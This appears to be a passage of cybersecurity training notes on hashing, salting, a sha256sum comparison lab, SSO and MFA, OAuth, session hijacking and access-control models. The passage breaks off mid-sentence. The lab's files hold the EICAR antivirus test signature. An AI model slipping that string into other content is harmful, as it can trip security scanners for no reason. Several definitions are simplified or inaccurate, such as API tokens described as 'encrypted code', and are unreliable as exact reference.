Generally, the longer the hash value, the more secure it is. It wasn’t long after MD5's creation that
security practitioners discovered 128-bit digests resulted in a major vulnerability.
Here is an example of how plaintext gets turned into hash values:
Hash collisions
One of the flaws in MD5 happens to be a characteristic of all hash functions. Hash algorithms map any
input, regardless of its length, into a fixed-size value of letters and numbers. What’s the problem with
that? Although there is an infinite number of possible inputs, there's only a finite set of available
outputs!
MD5 values are limited to 32 characters in length. Due to the limited output size, the algorithm is
considered to be vulnerable to hash collision, an instance when different inputs produce the same hash
value. Because hashes are used for authentication, a hash collision is similar to copying someone’s
identity. Attackers can carry out collision attacks to fraudulently impersonate authentic data.
Next-generation hashing
To avoid the risk of hash collisions, functions that generated longer values were needed. MD5's
shortcomings gave way to a new group of functions known as the Secure Hashing Algorithms, or SHAs.
The National Institute of Standards and Technology (NIST) approves each of these algorithms. Numbers
beside each SHA function indicate the size of its hash value in bits. Except for SHA-1, which produces a
160-bit digest, these algorithms are considered to be collision-resistant. However, that doesn’t make
them invulnerable to other exploits.
Five functions make up the SHA family of algorithms:
● SHA-1
● SHA-224
● SHA-256
● SHA-384
● SHA-512
Secure password storage
Passwords are typically stored in a database where they are mapped to a username. The server receives
a request for authentication that contains the credentials supplied by the user. It then looks up the
username in the database, compares the stored password with the one provided, and verifies that they
match before granting access.
This is a safe system unless an attacker gains access to the user database. If passwords are stored in
plaintext, then an attacker can steal that information and use it to access company resources. Hashing
adds an additional layer of security. Because hash values can't be reversed, an attacker would not be
able to steal someone's login credentials if they managed to gain access to the database.
Rainbow tables
A rainbow table is a file of pre-generated hash values and their associated plaintext. They’re like
dictionaries of weak passwords. Attackers capable of obtaining an organization’s password database can
use a rainbow table to compare them against all possible values.
Adding some “salt”
Functions with larger digests are less vulnerable to collision and rainbow table attacks. But as you’re
learning, no security control is perfect.
Salting is an additional safeguard that's used to strengthen hash functions. A salt is a random string of
characters that's added to data before it's hashed. The additional characters produce a more unique
hash value, making salted data resilient to rainbow table attacks.
For example, a database containing passwords might have several hashed entries for the password
"password." If those passwords were all salted, each entry would be completely different. That means an
attacker using a rainbow table would be unable to find matching values for "password" in the database.
For this reason, salting has become increasingly common when storing passwords and other types of
sensitive data. The length and uniqueness of a salt is important. Similar to hash values, the longer and
more complex a salt is, the harder it is to crack.
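The "password" scenario above can be sketched in the shell, using `openssl rand` for the salts and SHA-256 as the hash; this is purely illustrative, since production systems use dedicated password-hashing functions such as bcrypt, scrypt, or Argon2 rather than a bare salted SHA-256:

```shell
# Two users choose the same weak password...
password="password"

# ...but each account gets its own random salt, prepended before hashing.
salt1=$(openssl rand -hex 16)
salt2=$(openssl rand -hex 16)
hash1=$(printf '%s%s' "$salt1" "$password" | sha256sum | cut -d' ' -f1)
hash2=$(printf '%s%s' "$salt2" "$password" | sha256sum | cut -d' ' -f1)

# The stored digests differ, so a single rainbow-table entry for
# "password" cannot match both accounts.
echo "$salt1 $hash1"
echo "$salt2 $hash2"
```

The salt is stored alongside each hash so the server can repeat the computation at login; its value doesn't need to be secret, only unique per entry.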
Key takeaways
Security professionals often use hashing as a tool to validate the integrity of program files, documents,
and other types of data. Another way it’s used is to reduce the chances of a data breach. As you’ve
learned, not all hashing functions provide the same level of protection. Rainbow table attacks are more
likely to work against algorithms that generate shorter keys, like MD5. Many small- and medium-sized
businesses still rely on MD5 to secure sensitive data. Knowing about alternative algorithms and salting
better prepares you to make impactful security recommendations.
Activity: Create hash values
Introduction
In this lab, you'll create and evaluate the hash values for two files. You will use Linux commands to
calculate the hash of two files and observe any differences in the hashes produced. Then, you'll
determine whether the files are the same or different.
What you’ll do
You have multiple tasks in this lab:
● List the contents of the home directory
● Compare the plain text of the two files presented for hashing
● Compute the sha256sum hash of the two separate files
● Compare the hashes provided to identify the differences
Task 1. Generate hashes for files
The lab starts in your home directory, /home/analyst, as the current working directory.
This directory contains two files file1.txt and file2.txt, which contain different data.
In this task, you need to display the contents of each of these files. You’ll then generate a
hash value for each of these files and send the values to new files, which you’ll use to
examine the differences in these values later.
1. Use the ls command to list the contents of the directory.
Two files, file1.txt and file2.txt, are listed.
2. Use the cat command to display the contents of the file1.txt file:
cat file1.txt
Note: If you enter a command incorrectly and it fails to return to the command-line prompt, you can
press CTRL+C to stop the process and force the shell to return to the command-line prompt.
3. Use the cat command to display the contents of the file2.txt file:
cat file2.txt
4. Review the output of the two file contents:
analyst@4fb6d613b6b0:~$ cat file1.txt
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
analyst@4fb6d613b6b0:~$ cat file2.txt
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
5. Use the sha256sum command to generate the hash of the file1.txt file:
sha256sum file1.txt
You now need to follow the same step for the file2.txt file.
6. Use the sha256sum command to generate the hash of the file2.txt file:
sha256sum file2.txt
7. Review the generated hashes of the contents of the two files:
analyst@4fb6d613b6b0:~$ sha256sum file1.txt
131f95c51cc819465fa1797f6ccacf9d494aaaff46fa3eac73ae63ffbdfd8267 file1.txt
analyst@4fb6d613b6b0:~$ sha256sum file2.txt
2558ba9a4cad1e69804ce03aa2a029526179a91a5e38cb723320e83af9ca017b file2.txt
You have completed this task and used the sha256sum command to generate hash values
for the file1.txt and file2.txt files.
Task 2. Compare hashes
In this task, you’ll write the hashes to two separate files and then compare them to find the
difference.
1. Use the sha256sum command to generate the hash of the file1.txt file, and send the output
to a new file called file1hash:
sha256sum file1.txt >> file1hash
You now need to complete the same step for the file2.txt file.
2. Use the sha256sum command to generate the hash of the file2.txt file, and send the output
to a new file called file2hash:
sha256sum file2.txt >> file2hash
Now, you should have two hashes written to separate files. The first hash was written to
the file1hash file, and the second hash was written to the file2hash file.
You can manually display and compare the differences.
3. Use the cat command to display the hash values in the file1hash and file2hash files.
4. Inspect the output and note the difference in the hash values.
Note: Although the content in file1.txt and file2.txt previously appeared identical, the hashes
written to the file1hash and file2hash files are completely different.
Now, you can use the cmp command to compare the two files byte by byte. If a difference is
found, the command reports the byte and line number where the first difference is found.
5. Use the cmp command to highlight the differences in the file1hash and file2hash files:
cmp file1hash file2hash
6. Review the output, which reports the first difference between the two files:
analyst@4fb6d613b6b0:~$ cmp file1hash file2hash
file1hash file2hash differ: char 1, line 1
Note: The output of the cmp command indicates that the hashes differ at the first character in the
first line.
Access controls and authentication systems
Protecting data is a fundamental feature of security controls. When it comes to keeping information
safe and secure, hashing and encryption are powerful, yet limited tools. Managing who or what has
access to information is also key to safeguarding information. The next series of controls that we'll
be exploring are access controls, the security controls that
manage access, authorization, and accountability of information. When done well, access controls
maintain data confidentiality, integrity, and availability. They also get users
the information they need quickly. These systems are commonly broken down
into three separate, yet related functions known as the authentication,
authorization, and accounting framework. Each control has its own protocol and
systems that make them work. In this video, let's get comfortable with the basics of the first one on
the list, authentication. Authentication systems are access controls that serve a very basic purpose.
They ask anything attempting to access information this simple question: who are you?
Organizations go about collecting answers to these questions differently, depending on the
objectives of their security policy. Some are more thorough than others,
but in general, responses to this question can be based on three factors of authentication. The first
is knowledge. Authentication by knowledge refers to something the user knows, like a password or
the answer to a security question they provided previously. Another factor is ownership, referring to
something the user possesses. A commonly used type of authentication by ownership is a one-time
passcode, or OTP. You've probably experienced
these at one time or another. They're a random number sequence that an application or website
will send you via text or email and ask you to provide. Last is characteristic. Authentication
by this factor is something the user is. Biometrics, like fingerprint scans on your
smartphone, are examples of this type of authentication. While not used everywhere, this form of
authentication is becoming more common because it's much tougher for
criminals to impersonate someone if they have to mimic a fingerprint or facial scan as opposed to a
password. The information provided during authentication needs to match the information on file
for these access controls to work. When the credentials don't match,
authentication fails and access is denied. When they match, access is granted. Incorrectly denying
access can be frustrating to anyone. To make access systems more convenient, many organizations
these days rely on single sign-on. Single sign-on, or SSO, is a technology that combines several
different logins into one. Can you imagine having to reintroduce
yourself every time you meet up with a friend? That's exactly the sort of problem SSO solves.
Instead of requiring users to authenticate repeatedly, SSO establishes their identity once, allowing
them to gain access to company resources faster. While SSO systems are helpful when it comes to
speeding up the authentication process, they present a significant
vulnerability when used alone. Denying access to authorized users can be frustrating, but you know
what's even worse? Incorrectly granting access to the wrong user. SSO technology is great, but not if
it relies on just a single factor of authentication. Adding more authentication
factors strengthens these systems. Multi-factor authentication, or MFA, is a security measure that
requires a user to verify their identity in two or more ways to access a system or network. MFA
combines two or more independent credentials, like knowledge and ownership, to prove that
someone is who they claim to be. SSO and MFA are often used in
conjunction with one another to layer the defense capabilities of authentication systems. When
both are used, organizations can ensure convenient access that is also secure. Now that we covered
authentication, we're ready to explore the second part of the framework.
The rise of SSO and MFA
Most companies help keep their data safely locked up behind authentication systems. Usernames and
passwords are the keys that unlock information for most organizations. But are those credentials
enough? Information security often focuses on managing a user's access to, and authorization for,
information.
Previously, you learned about the three factors of authentication: knowledge, ownership, and
characteristic. Single sign-on (SSO) and multi-factor authentication (MFA) are two technologies that
have become popular for implementing these authentication factors. In this reading, you’ll learn how
these technologies work and why companies are adopting them.
A better approach to authentication
Single sign-on (SSO) is a technology that combines several different logins into one. More companies are
turning to SSO as a solution to their authentication needs for three reasons:
1. SSO improves the user experience by reducing the number of usernames and passwords
people have to remember.
2. Companies can lower costs by streamlining how they manage connected services.
3. SSO improves overall security by reducing the number of access points attackers can target.
This technology became available in the mid-1990s as a way to combat password fatigue, which refers
to people’s tendency to reuse passwords across services. Remembering many different passwords can
be a challenge, but using the same password repeatedly is a major security risk. SSO solves this dilemma
by shifting the burden of authentication away from the user.
How SSO works
SSO works by automating how trust is established between a user and a service provider. Rather than
placing the responsibility on an employee or customer, SSO solutions use trusted third-parties to prove
that a user is who they claim to be. This is done through the exchange of encrypted access tokens
between the identity provider and the service provider.
Similar to other kinds of digital information, these access tokens are exchanged using specific protocols.
SSO implementations commonly rely on two different authentication protocols: LDAP and SAML. LDAP,
which stands for Lightweight Directory Access Protocol, is mostly used to transmit information on-premises; SAML, which stands for Security Assertion Markup Language, is mostly used to transmit
information off-premises, like in the cloud.
Note: LDAP and SAML protocols are often used together.
Here's an example of how SSO can connect a user to multiple applications with one access token:
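The diagram this refers to isn't reproduced here, but the idea can be sketched in Python. Everything below is hypothetical and not the course's implementation (the HMAC-based signing, the shared secret, and the user name are illustrative only): an identity provider establishes the user's identity once by signing a token, and every trusting service provider can validate that same token.

```python
import hashlib
import hmac
import json

# Hypothetical key the identity provider shares with trusting service providers.
SHARED_SECRET = b"demo-secret"

def issue_token(user: str) -> str:
    """Identity provider signs the user's identity once."""
    payload = json.dumps({"user": user})
    signature = hmac.new(SHARED_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{signature}"

def verify_token(token: str):
    """Any trusting service provider can validate the same token."""
    payload, signature = token.rsplit("|", 1)
    expected = hmac.new(SHARED_SECRET, payload.encode(), hashlib.sha256).hexdigest()
    if hmac.compare_digest(signature, expected):
        return json.loads(payload)["user"]
    return None  # a tampered or forged token is rejected

token = issue_token("alice")   # the user authenticates once
print(verify_token(token))     # one app accepts the token: alice
print(verify_token(token))     # a second app accepts the same token: alice
```

Because every service trusts the identity provider's signature rather than collecting its own password, the user never re-enters credentials for each application.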
Limitations of SSO
Usernames and passwords alone are not always the most secure way of protecting sensitive
information. SSO provides useful benefits, but there’s still the risk associated with using one form of
authentication. For example, a lost or stolen password could expose information across multiple
services. Thankfully, there’s a solution to this problem.
MFA to the rescue
Multi-factor authentication (MFA) requires a user to verify their identity in two or more ways to access a
system or network. In a sense, MFA is similar to using an ATM to withdraw money from your bank
account. First, you insert a debit card into the machine as one form of identification. Then, you enter
your PIN as a second form of identification. Combined, both steps, or factors, are used to verify
your identity before authorizing you to access the account.
Strengthening authentication
MFA builds on the benefits of SSO. It works by having users prove that they are who they claim to be.
The user must provide two factors (2FA) or three factors (3FA) to authenticate their identity. The
MFA process asks users to provide these proofs, such as:
● Something a user knows: most commonly a username and password
● Something a user has: normally received from a service provider, like a one-time passcode (OTP) sent via SMS
● Something a user is: refers to physical characteristics of a user, like their fingerprints or facial scans
Requiring multiple forms of identification is an effective security measure, especially in cloud
environments. It can be difficult for businesses in the cloud to ensure that the users remotely accessing
their systems are not threat actors. MFA can reduce the risk of authenticating the wrong users by
requiring forms of identification that are difficult to imitate or brute force.
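As a rough sketch of that idea, an MFA check only succeeds when every factor verifies. The stored hash, the passcode, and the function names below are all hypothetical; real systems use dedicated password-hashing and OTP libraries rather than plain SHA-256:

```python
import hashlib
import secrets

# Hypothetical stored credential for one user (illustration only).
STORED_PASSWORD_HASH = hashlib.sha256(b"correct horse").hexdigest()

def authenticate(password: str, submitted_otp: str, issued_otp: str) -> bool:
    """MFA sketch: both the knowledge factor (password) and the
    ownership factor (one-time passcode) must check out."""
    knows = hashlib.sha256(password.encode()).hexdigest() == STORED_PASSWORD_HASH
    has = secrets.compare_digest(submitted_otp, issued_otp)
    return knows and has

otp = "492017"  # passcode the service provider sent via SMS
print(authenticate("correct horse", "492017", otp))  # True: both factors match
print(authenticate("correct horse", "000000", otp))  # False: wrong passcode
```

An attacker who steals the password alone still fails the second factor, which is exactly the risk reduction the reading describes.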
Key takeaways
Implementing both SSO and MFA security controls improves security without sacrificing the user
experience. Relying on passwords alone is a serious vulnerability. Implementing SSO means fewer
points of entry, but that’s not enough. Combining SSO and MFA can be an effective way to protect
information, so that users have a streamlined experience while unauthorized people are kept away from
important information.
The Mechanisms of Authorization
Access is as much about authorization as it is about authentication. One of the most
important functions of access controls is how they assign responsibility for
certain systems and processes. Next up in our exploration of access control systems are the
mechanisms of authorization. These protocols actually work closely together with authentication
technologies. While one validates who the user is, the other determines what
they're allowed to do. Let's take a look at the next part of the authentication, authorization, and
accounting framework that protects private information. Earlier, we learned about the principle of
least privilege. Authorization is linked to the idea that access to information only
lasts as long as needed. Authorization systems are also heavily influenced by this idea in addition to
another important security principle, the separation of duties. Separation of duties is the principle
that users should not be given levels of authorization that will allow them to misuse a system.
Separating duties reduces the risk of system failures and inappropriate behavior from users. For
example, a person responsible for providing customer service shouldn't also be authorized to rate
their own performance. In this position, they could easily neglect their duties while continuing to
give themselves high marks with no oversight. Similarly, if one person was authorized to develop
and test a security system, they are much more likely to be unaware of its weaknesses. Both the
principle of least privilege and the concept of separating duties apply to more than just people.
They apply to all systems including networks, databases, processes, and any other aspect of an
organization. Ultimately, authorization depends on a system or user's role. When it comes to
securing data over a network, there are a couple of frequently used access controls that you should
be familiar with: HTTP basic auth and OAuth. Have you ever wondered what the HTTP in web
addresses stands for? It stands for hypertext transfer protocol, which is how communications are
established over a network. HTTP uses what is known as basic auth, the technology used to establish a
user's request to access a server. Basic auth works by sending an identifier every time a user
communicates with a web page. Some websites still use basic auth to tell whether someone is
authorized to access information on that site. However, this protocol is vulnerable to attacks
because it transmits usernames and passwords openly over the network. Most websites today use
HTTPS instead, which stands for hypertext transfer protocol secure. This protocol doesn't expose
sensitive information, like access credentials, when communicating over the network. Another
secure authentication technology used today is OAuth. OAuth is an open-standard authorization
protocol that shares designated access between applications. For example, you can
tell Google that it's okay for another website to access your profile to create an account. Instead of
requesting and sending sensitive usernames and passwords over the network, OAuth uses API
tokens to verify access between you and a service provider. An API token is a small block of
encrypted code that contains information about a user. These tokens contain things like your
identity, site permissions, and more. OAuth sends and receives access requests using API tokens by
passing them from a server to a user's device. Let's explore what's going on behind the scenes.
When you authorize a site to create an account using your Google profile, all of Google's usual login
protocols are still active. If you have multi-factor authentication enabled on your account, and you
should, you'll still have the security benefits that it provides. API tokens minimize risks in a major
way. These API tokens serve as an additional layer of encryption that helps to keep your Google
password safe in the event of a breach on another platform. Basic auth and OAuth are just a couple
of examples of authorization tools that are designed with
the principles of least privilege and separation of duty in mind. There are many other
controls that help limit the risk of unauthorized access to information. In addition to
controlling access, it's also important to monitor it.
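The earlier warning that basic auth transmits credentials openly can be demonstrated directly. This sketch (with a hypothetical username and password) builds the `Authorization` header a browser would send and shows that base64 encoding is trivially reversible, which is why HTTPS matters:

```python
import base64

def basic_auth_header(username: str, password: str) -> str:
    """Build the HTTP Basic auth header a client sends on every request."""
    credentials = f"{username}:{password}".encode()
    return "Basic " + base64.b64encode(credentials).decode()

header = basic_auth_header("analyst", "hunter2")
print(header)  # Basic YW5hbHlzdDpodW50ZXIy

# Anyone watching the network can trivially reverse it; encoding is not encryption:
encoded = header.split(" ", 1)[1]
print(base64.b64decode(encoded).decode())  # analyst:hunter2
```

With plain HTTP, that header crosses the network in the clear on every request; HTTPS wraps the whole exchange in encryption so the credentials are never exposed in transit.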
Here's a simple breakdown of how API tokens work:
1. Authentication: When you want to use an API (Application Programming Interface)
to access certain features or data from a service (e.g., a social media platform, a
payment gateway, or a cloud storage service), you typically need permission. API
tokens are used to prove that you have the right to access that service.
2. Generation: To get an API token, you usually need to create an account with the
service provider. Once you're logged in, you can request an API token through their
developer or settings portal.
3. Protection: API tokens are sensitive pieces of information, much like a password.
They should be kept secret to prevent unauthorized access. Service providers often
use encryption to protect these tokens when they're transmitted over the internet.
4. Usage: When you make a request to the API, you include your API token in the
request header or as a parameter. This token tells the server which account or
application is making the request and what level of access it has.
5. Authorization: The server checks the API token to see if it's valid and if the client has
permission to perform the requested action. If everything checks out, the server will
respond to the client's request, providing the requested data or performing the
requested action.
6. Revocation: If you no longer want a particular program or service to access your
account's data through the API, you can usually revoke or delete the associated API
token. This will prevent further access.
API tokens are a fundamental part of modern software development because they allow
different services and applications to work together securely. They are commonly used in
web and mobile app development, allowing third-party developers to integrate with
various platforms and services while maintaining security and control.
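Steps 4 through 6 of the breakdown above can be sketched in a few lines of Python. The token registry, token strings, and scopes below are hypothetical, not any real provider's API:

```python
# Hypothetical server-side token registry: token -> (account, scopes).
TOKENS = {
    "tok_7f3a": ("alice", {"read"}),
    "tok_91bc": ("ci-bot", {"read", "write"}),
}

def handle_request(headers: dict, action: str):
    """Steps 4-5: read the token from the request header, then
    authorize the requested action against the token's scopes."""
    token = headers.get("Authorization", "").removeprefix("Bearer ").strip()
    if token not in TOKENS:
        return 401, "invalid token"                       # authentication fails
    account, scopes = TOKENS[token]
    if action not in scopes:
        return 403, f"{account} lacks '{action}' scope"   # authorization fails
    return 200, f"{action} ok for {account}"

print(handle_request({"Authorization": "Bearer tok_7f3a"}, "read"))   # (200, ...)
print(handle_request({"Authorization": "Bearer tok_7f3a"}, "write"))  # (403, ...)

# Step 6, revocation, amounts to deleting the token server-side:
del TOKENS["tok_7f3a"]
print(handle_request({"Authorization": "Bearer tok_7f3a"}, "read"))   # (401, ...)
```

Note how the token both identifies the caller and bounds what they may do, which is the "level of access" the breakdown refers to.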
Why we audit user activity
Have you ever wondered if your employer is keeping a record of when you log into
company systems? Well, they are, if they're implementing the third and final function
of the authentication, authorization, and accounting framework. Accounting is the practice of
monitoring the access logs of a system. These logs contain information like who accessed the
system, and when they accessed it, and what resources they used. Security analysts use access logs
a lot. The data they contain is a helpful way to identify trends, like failed login attempts. They're
also used to uncover hackers who have gained access to a system, and for detecting an incident, like
a data breach. In this field, access logs are essential. Oftentimes, analyzing them is the first
procedure you'll follow when investigating a security event. So, how do access logs compile all this
useful information? Let's examine this more closely. Anytime a user accesses a system, they initiate
what's called a session. A session is a sequence
of network HTTP basic auth requests and responses associated with the same user, like when you
visit a website. Access logs are essentially records of sessions that capture the moment a user
enters a system until the moment they leave it. Two actions are triggered when the session begins.
The first is the creation of a session ID. A session ID is a unique token that identifies a user and their
device while accessing the system. Session IDs are attached to the user until they either close their
browser or the session times out. The second action that takes place at the start of a session is an
exchange of session cookies between a server and a user's device. A session cookie is a token that
websites use to validate a session and determine how long that session should last. When cookies are
exchanged between your computer and a server, your session ID is read to determine what
information the website should show you. Cookies make web sessions safer and more efficient. The
exchange of tokens means that no sensitive information, like usernames and passwords, are shared.
Session cookies prevent attackers from obtaining sensitive data. However, there's other damage
that they can do. With a stolen cookie, an attacker can impersonate a user using their session token.
This kind of attack is known as session hijacking. Session hijacking
is an event when attackers obtain a legitimate user's session ID. During these kinds of attacks, cyber
criminals impersonate the user, causing all sorts of harm. Money or private
data can be stolen. If, for example, hijackers obtain a single sign-on credential from stolen cookies,
they can even gain access to additional systems that otherwise seem secure. This is one reason why
accounting and monitoring session logs is so important. Unusual activity on access logs can be an
indication that information has been improperly accessed or stolen. At the end of the day,
accounting is how we gain valuable insight that makes information safer.
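Here is a sketch of the kind of accounting analysts do with access logs. The log entries, field layout, and threshold are all hypothetical; it simply flags the trend of repeated failed logins mentioned above:

```python
from collections import Counter

# Hypothetical access log entries: (timestamp, user, event).
ACCESS_LOG = [
    ("2023-11-01T09:02", "alice", "login_success"),
    ("2023-11-01T09:05", "mallory", "login_failed"),
    ("2023-11-01T09:06", "mallory", "login_failed"),
    ("2023-11-01T09:07", "mallory", "login_failed"),
    ("2023-11-01T09:15", "bob", "login_success"),
]

def failed_logins(log, threshold=3):
    """Flag users whose failed attempts reach the threshold --
    the kind of trend an analyst looks for first."""
    counts = Counter(user for _, user, event in log if event == "login_failed")
    return [user for user, n in counts.items() if n >= threshold]

print(failed_logins(ACCESS_LOG))  # ['mallory']
```

Real systems log far more context (source IP, session ID, resource accessed), but the workflow is the same: aggregate the records, then surface the unusual activity.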
Identity and access management
Security is more than simply combining processes and technologies to protect assets. Instead, security is
about ensuring that these processes and technologies are creating a secure environment that supports a
defense strategy. A key to doing this is implementing two fundamental security principles that limit
access to organizational resources:
● The principle of least privilege, in which a user is only granted the minimum level of access and authorization required to complete a task or function.
● Separation of duties, which is the principle that users should not be given levels of authorization that would allow them to misuse a system.
Both principles typically support each other. For example, according to least privilege, a person who
needs permission to approve purchases from the IT department shouldn't have the permission to
approve purchases from every department. Likewise, according to separation of duties, the person who
can approve purchases from the IT department should be different from the person who can input new
purchases.
In other words, least privilege limits the access that an individual receives, while separation of duties
divides responsibilities among multiple people to prevent any one person from having too much control.
Note: Separation of duties is sometimes referred to as segregation of duties.
Previously, you learned about the authentication, authorization, and accounting (AAA) framework. Many
businesses use this model to implement these two security principles and manage user access. In this
reading, you’ll learn about the other major framework for managing user access, identity and access
management (IAM). You will learn about the similarities between AAA and IAM and how they're
commonly implemented.
Identity and access management (IAM)
As organizations become more reliant on technology, regulatory agencies have put more pressure on
them to demonstrate that they’re doing everything they can to prevent threats. Identity and access
management (IAM) is a collection of processes and technologies that helps organizations manage digital
identities in their environment. Both AAA and IAM systems are designed to authenticate users,
determine their access privileges, and track their activities within a system.
Whichever model your organization uses, it is more than a single, clearly defined system. Each consists
of a collection of security controls that ensure the right user is granted access to the right resources at
the right time and for the right reasons. Each of those four factors is determined by your organization's
policies and processes.
Note: A user can either be a person, a device, or software.
Authenticating users
To ensure the right user is attempting to access a resource requires some form of proof that the user is
who they claim to be. In a video on authentication controls, you learned that there are a few factors that
can be used to authenticate a user:
● Knowledge, or something the user knows
● Ownership, or something the user possesses
● Characteristic, or something the user is
Authentication is mainly verified with login credentials. Single sign-on (SSO), a technology that combines
several different logins into one, and multi-factor authentication (MFA), a security measure that requires
a user to verify their identity in two or more ways to access a system or network, are other tools that
organizations use to authenticate individuals and systems.
Pro tip: Another way to remember this authentication model is: something you know, something you
have, and something you are.
User provisioning
Back-end systems need to be able to verify whether the information provided by a user is accurate. To
accomplish this, users must be properly provisioned. User provisioning is the process of creating and
maintaining a user's digital identity. For example, a college might create a new user account when a new
instructor is hired. The new account will be configured to provide access to instructor-only resources
while they are teaching. Security analysts are routinely involved with provisioning users and their
access privileges.
Pro tip: Another role analysts have in IAM is to deprovision users. This is an important practice that
removes a user's access rights when they should no longer have them.
Granting authorization
If the right user has been authenticated, the network should ensure the right resources are made
available. There are three common frameworks that organizations use to handle this step of IAM:
● Mandatory access control (MAC)
● Discretionary access control (DAC)
● Role-based access control (RBAC)
Mandatory Access Control (MAC)
MAC is the strictest of the three frameworks. Authorization in this model is based on a strict need-to-know basis. Access to information must be granted manually by a central authority or system
administrator. For example, MAC is commonly applied in law enforcement, military, and other
government agencies where users must request access through a chain of command. MAC is also known
as non-discretionary control because access isn’t given at the discretion of the data owner.
Discretionary Access Control (DAC)
DAC is typically applied when a data owner decides appropriate levels of access. One example of DAC is
when the owner of a Google Drive folder shares editor, viewer, or commenter access with someone else.
Role-Based Access Control (RBAC)
RBAC is used when authorization is determined by a user's role within an organization. For example, a
user in the marketing department may have access to user analytics but not network administration.
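RBAC in particular is straightforward to sketch. The roles, users, and resource names below are hypothetical, chosen to mirror the marketing example above:

```python
# Hypothetical role-to-permission mapping (RBAC): access is attached
# to roles, and users inherit access through their assigned role.
ROLE_PERMISSIONS = {
    "marketing": {"user_analytics"},
    "network_admin": {"network_administration", "user_analytics"},
}

USER_ROLES = {"dana": "marketing", "ravi": "network_admin"}

def is_authorized(user: str, resource: str) -> bool:
    """Authorization is determined by the user's role, not the user directly."""
    role = USER_ROLES.get(user)
    return resource in ROLE_PERMISSIONS.get(role, set())

print(is_authorized("dana", "user_analytics"))          # True
print(is_authorized("dana", "network_administration"))  # False
```

Because permissions live on the role rather than on individuals, provisioning and deprovisioning a user reduces to assigning or removing a role, which is a large part of RBAC's appeal.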
Access control technologies
Users often experience authentication and authorization as a single, seamless experience. In large part,
that’s due to access control technologies that are configured to work together. These tools offer the
speed and automation needed by administrators to monitor and modify access rights. They also
decrease errors and potential risks.
An organization's IT department sometimes develops and maintains customized access control
technologies on their own. A typical IAM or AAA system consists of a user directory, a set of tools for
managing data in that directory, an authorization system, and an auditing system. Some organizations
create custom systems to tailor them to their security needs. However, building an in-house solution
comes at a steep cost of time and other resources.
Instead, many organizations opt to license third-party solutions that offer a suite of tools that enable
them to quickly secure their information systems. Keep in mind, security is about more than combining
a bunch of tools. It’s always important to configure these technologies so they can help to provide a
secure environment.
Key takeaways
Controlling access requires a collection of systems and tools. IAM and AAA are common frameworks for
implementing least privilege and separation of duties. As a security analyst, you might be responsible for
user provisioning and collaborating with other IAM or AAA teams. Having familiarity with these models
is valuable for helping organizations achieve their security objectives. They each ensure that the right
user is granted access to the right resources at the right time and for the right reasons.
Resources for more information
The identity and access management industry is growing at a rapid pace. As with other domains in
security, it’s important to stay informed.
● IDPro© is a professional organization dedicated to sharing essential IAM industry knowledge.
Activity: Improve authentication, authorization, and accounting for a small
business
Scenario
Review the scenario below. Then complete the step-by-step instructions.
You’re the first cybersecurity professional hired by a growing business.
Recently, a deposit was made from the business to an unknown bank account. The finance
manager says they didn’t make a mistake. Fortunately, they were able to stop the payment.
The owner has asked you to investigate what happened to prevent any future incidents.
To do this, you’ll need to do some accounting on the incident to better understand what
happened. First, you will review the access log of the incident. Next, you will take notes that
can help you identify a possible threat actor. Then, you will spot issues with the access
controls that were exploited by the user. Finally, you will recommend mitigations that can
improve the business' access controls and reduce the likelihood that this incident reoccurs.
Glossary terms from week 2
Terms and definitions from Course 5, Week 2
Access controls: Security controls that manage access, authorization, and accountability of information
Algorithm: A set of rules used to solve a problem
Application programming interface (API) token: A small block of encrypted code that contains
information about a user
Asymmetric encryption: The use of a public and private key pair for encryption and decryption of data
Basic auth: The technology used to establish a user’s request to access a server
Bit: The smallest unit of data measurement on a computer
Brute force attack: The trial and error process of discovering private information
Cipher: An algorithm that encrypts information
Cryptographic key: A mechanism that decrypts ciphertext
Cryptography: The process of transforming information into a form that unintended readers can’t
understand
Data custodian: Anyone or anything that’s responsible for the safe handling, transport, and storage of
information
Data owner: The person that decides who can access, edit, use, or destroy their information
Digital certificate: A file that verifies the identity of a public key holder
Encryption: The process of converting data from a readable format to an encoded format
Hash collision: An instance when different inputs produce the same hash value
Hash function: An algorithm that produces a code that can’t be decrypted
Hash table: A data structure that's used to store and reference hash values
Identity and access management (IAM): A collection of processes and technologies that helps
organizations manage digital identities in their environment
Information privacy: The protection of unauthorized access and distribution of data
Multi-factor authentication (MFA): A security measure that requires a user to verify their identity in two
or more ways to access a system or network
Non-repudiation: The concept that the authenticity of information can’t be denied
OAuth: An open-standard authorization protocol that shares designated access between applications
Payment Card Industry Data Security Standards (PCI DSS): A set of security standards formed by major
organizations in the financial industry
Personally identifiable information (PII): Any information used to infer an individual's identity
Principle of least privilege: The concept of granting only the minimal access and authorization required
to complete a task or function
Protected health information (PHI): Information that relates to the past, present, or future physical or
mental health or condition of an individual
Public key infrastructure (PKI): An encryption framework that secures the exchange of online
information
Rainbow table: A file of pre-generated hash values and their associated plaintext
Salting: An additional safeguard that’s used to strengthen hash functions
Security assessment: A check to determine how resilient current security implementations are against
threats
Security audit: A review of an organization's security controls, policies, and procedures against a set of
expectations
Security controls: Safeguards designed to reduce specific security risks
Separation of duties: The principle that users should not be given levels of authorization that would
allow them to misuse a system
Session: A sequence of network HTTP basic auth requests and responses associated with the same user
Session cookie: A token that websites use to validate a session and determine how long that session
should last
Session hijacking: An event when attackers obtain a legitimate user’s session ID
Session ID: A unique token that identifies a user and their device while accessing a system
Single Sign-On (SSO): A technology that combines several different logins into one
Symmetric encryption: The use of a single secret key to exchange information
User provisioning: The process of creating and maintaining a user's digital identity
Vulnerability Management
For every asset that needs protecting, there are dozens of vulnerabilities. Finding those
vulnerabilities and fixing them before they become a problem is the key to keeping an asset safe. We've
already covered what a vulnerability is. Recall that a vulnerability is a weakness that can be
exploited by a threat. That word, can, is an important part of this description. Why is that? Let's
explore that together to find out more. Imagine I handed you an important document and asked you
to keep it safe. How would you do that? Some of you might first think about locking it up in a safe
place. Behind this is the understanding that, because documents can be easily moved, they are
vulnerable to theft. When other vulnerabilities come to mind, like how paper burns easily or
doesn't resist water, you might add other protections. Similar to this example, security teams plan
to protect assets according to their vulnerabilities and how they can be exploited. In security, an
exploit is a way of taking advantage of a vulnerability. Besides finding vulnerabilities, security
planning relies a lot on thinking of exploits. For example, there are burglars out there who want to
cause harm. Homes have vulnerable systems that can be exploited by a burglar. One example is the
